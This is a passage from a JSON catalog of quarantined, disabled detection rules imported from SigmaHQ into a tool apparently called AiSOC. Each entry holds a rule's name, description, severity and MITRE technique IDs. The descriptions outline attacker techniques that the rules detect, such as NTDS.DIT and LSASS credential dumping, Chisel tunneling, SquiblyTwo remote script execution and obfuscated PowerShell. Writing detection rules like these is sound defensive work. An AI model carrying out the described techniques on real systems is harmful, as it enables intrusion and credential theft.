"2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_txt_exec_strings.yml" } }, { "id": "sigmahq-sigma-8b0e12da-d3c3-49db-bb4f-256703f380e5", "type": "detection", "name": "PUA - Chisel Tunneling Tool Execution", "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-chisel-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_chisel.yml" } }, { "id": "sigmahq-sigma-8b48ad89-10d8-4382-a546-50588c410f0d", "type": "detection", "name": "Remote AppX Package Downloaded from File Sharing or CDN Domain", "description": "Detects an appx package that was added to the pipeline of the \"to be processed\" packages which was downloaded from a file sharing or CDN domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-appx-package-downloaded-from-file-sharing-or-cdn-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b48ad89-10d8-4382-a546-50588c410f0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-8b5dacf2-aeb7-459d-b133-678eb696d410", "type": "detection", "name": "FortiGate - VPN SSL Settings Modified", "description": "Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).\nThis behavior was observed in pair with the addition of a VPN SSL Web Portal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-vpn-ssl-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b5dacf2-aeb7-459d-b133-678eb696d410", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml" } }, { "id": "sigmahq-sigma-8b69fd42-9dad-4674-abef-7fdef43ef92a", "type": "detection", "name": "DNS Query To Put.io - DNS Client", "description": "Detects DNS queries for subdomains related to \"Put.io\" sharing website.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-put-io-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b69fd42-9dad-4674-abef-7fdef43ef92a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_put_io.yml" } }, { "id": "sigmahq-sigma-8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "type": "detection", "name": "Windows Hypervisor Enforced Code Integrity Disabled", "description": "Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-hypervisor-enforced-code-integrity-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml" } }, { "id": "sigmahq-sigma-8b93a509-1cb8-42e1-97aa-ee24224cdc15", "type": "detection", "name": "Sensitive File Dump Via Wbadmin.EXE", "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-dump-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b93a509-1cb8-42e1-97aa-ee24224cdc15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml" } }, { "id": "sigmahq-sigma-8b9606c9-28be-4a38-b146-0e313cc232c1", "type": "detection", "name": "Potential Ransomware Activity Using LegalNotice Message", "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ransomware-activity-using-legalnotice-message.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml" } }, { "id": "sigmahq-sigma-8bc063d5-3a3a-4f01-a140-bc15e55e8437", "type": "detection", "name": "Suspicious GetTypeFromCLSID ShellExecute", "description": "Detects suspicious Powershell code that execute COM Objects", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gettypefromclsid-shellexecute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" } }, { "id": "sigmahq-sigma-8bc64091-6875-4881-aaf9-7bd25b5dda08", "type": "detection", "name": "Suspicious Process Patterns NTDS.DIT Exfil", "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-patterns-ntds-dit-exfil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntds.yml" } }, { "id": "sigmahq-sigma-8c0eca51-0f88-4db2-9183-fdfb10c703f9", "type": "detection", "name": "LSA PPL Protection Setting Modification via CommandLine", "description": "Detects modification of LSA PPL protection settings via CommandLine.\nIt may indicate an attempt to disable protection and enable credential dumping tools to access LSASS process memory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1689" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsa-ppl-protection-setting-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lsa_ppl_protection_setting_modification_via_cli.yml" } }, { "id": "sigmahq-sigma-8c1a5675-cb85-452f-a298-b01b22a51856", "type": "detection", "name": "Suspicious Invocation of Shell via AWK - Linux", "description": "Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\nThis behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invocation-of-shell-via-awk-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c1a5675-cb85-452f-a298-b01b22a51856", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml" } }, { "id": "sigmahq-sigma-8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "type": "detection", "name": "New Outlook Macro Created", "description": "Detects the creation of a macro file for Outlook.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-outlook-macro-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml" } }, { "id": "sigmahq-sigma-8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "type": "detection", "name": "Active Directory Group Enumeration With Get-AdGroup", "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-group-enumeration-with-get-adgroup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" } }, { "id": "sigmahq-sigma-8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "type": "detection", "name": "Creation Exe for Service with Unquoted Path", "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-exe-for-service-with-unquoted-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" } }, { "id": "sigmahq-sigma-8c521530-5169-495d-a199-0a3a881ad24e", "type": "detection", "name": "NTFS Alternate Data Stream", "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntfs-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c521530-5169-495d-a199-0a3a881ad24e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" } }, { "id": "sigmahq-sigma-8c6ec464-4ae4-43ac-936a-291da66ed13d", "type": "detection", "name": "Roles Are Not Being Used", "description": "Identifies when a user has been assigned a privilege role and are not using that role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-are-not-being-used.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c6ec464-4ae4-43ac-936a-291da66ed13d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml" } }, { "id": "sigmahq-sigma-8c944ecb-6970-4541-8496-be554b8e2846", "type": "detection", "name": "Successful Authentications From Countries You Do Not Operate Out Of", "description": "Detect successful authentications from countries you do not operate out of.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-authentications-from-countries-you-do-not-operate-out-of.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c944ecb-6970-4541-8496-be554b8e2846", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" } }, { "id": "sigmahq-sigma-8ca7004b-e620-4ecb-870e-86129b5b8e75", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - System", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml" } }, { "id": "sigmahq-sigma-8cbc9475-8d05-4e27-9c32-df960716c701", "type": "detection", "name": "Potentially Suspicious Desktop Background Change Using Reg.EXE", "description": "Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-desktop-background-change-using-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cbc9475-8d05-4e27-9c32-df960716c701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml" } }, { "id": "sigmahq-sigma-8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "type": "detection", "name": "Bitsadmin to Uncommon IP Server Address", "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitsadmin-to-uncommon-ip-server-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml" } }, { "id": "sigmahq-sigma-8cd538a4-62d5-4e83-810b-12d41e428d6e", "type": "detection", "name": "Processes Accessing the Microphone and Webcam", "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/processes-accessing-the-microphone-and-webcam.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_camera_microphone_access.yml" } }, { "id": "sigmahq-sigma-8cde342c-ba48-4b74-b615-172c330f2e93", "type": "detection", "name": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-renamed-comsvcs-dll-loaded-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cde342c-ba48-4b74-b615-172c330f2e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" } }, { "id": "sigmahq-sigma-8d01b53f-456f-48ee-90f6-bc28e67d4e35", "type": "detection", "name": "Suspicious Obfuscated PowerShell Code", "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-obfuscated-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml" } }, { "id": "sigmahq-sigma-8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "type": "detection", "name": "Bad Opsec Powershell Code Artifacts", "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\nthat often undergo minimal changes by attackers due to bad opsec.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bad-opsec-powershell-code-artifacts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" } }, { "id": "sigmahq-sigma-8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "type": "detection", "name": "Wmiexec Default Output File", "description": "Detects the creation of the default output filename used by the wmiexec tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiexec-default-output-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" } }, { "id": "sigmahq-sigma-8d63dadf-b91b-4187-87b6-34a1114577ea", "type": "detection", "name": "Potential Remote SquiblyTwo Technique Execution", "description": "Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI)\nto execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process\nmalicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript.\nThe attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it\nwith full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common\nLOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1220", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-squiblytwo-technique-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d63dadf-b91b-4187-87b6-34a1114577ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" } }, { "id": "sigmahq-sigma-8d7e392e-9b28-49e1-831d-5949c6281228", "type": "detection", "name": "Network Connection Initiated By IMEWDBLD.EXE", "description": "Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-imewdbld-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d7e392e-9b28-49e1-831d-5949c6281228", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_imewdbld.yml" } }, { "id": "sigmahq-sigma-8d85cf08-bf97-4260-ba49-986a2a65129c", "type": "detection", "name": "Suspicious PowerShell In Registry Run Keys", "description": "Detects potential PowerShell commands or code within registry run keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-in-registry-run-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d85cf08-bf97-4260-ba49-986a2a65129c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" } }, { "id": "sigmahq-sigma-8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12", "type": "detection", "name": "Unsigned or Unencrypted SMB Connection to Share Established", "description": "Detects SMB server connections to shares without signing or encryption enabled.\nThis could indicate potential lateral movement activity using unsecured SMB shares.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-or-unencrypted-smb-connection-to-share-established.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/smbserver/connectivity/win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml" } }, { "id": "sigmahq-sigma-8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "type": "detection", "name": "Whoami.EXE Execution Anomaly", "description": "Detects the execution of whoami.exe with suspicious parent processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 